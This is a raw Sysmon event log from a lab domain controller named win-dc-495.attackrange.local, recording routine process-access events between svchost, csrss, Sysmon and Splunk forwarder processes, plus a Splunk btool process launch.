13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE0-6005-A700-00000000A301}2232C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8EE0-6005-A600-00000000A301}32443768C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EE0-6005-A700-00000000A301}2232C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.837{59A5CD1D-8EE0-6005-A700-00000000A301}2232C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk 
ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE0-6005-A600-00000000A301}3244C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 10341000x80000000000000003446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE0-6005-A600-00000000A301}3244C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000003444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE0-6005-A600-00000000A301}3244C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8EE0-6005-A500-00000000A301}50363160C:\Windows\system32\cmd.exe{59A5CD1D-8EE0-6005-A600-00000000A301}3244C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.831{59A5CD1D-8EE0-6005-A600-00000000A301}3244C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EE0-6005-A500-00000000A301}5036C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 10341000x80000000000000003433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.826{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE0-6005-A500-00000000A301}5036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:32.826{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 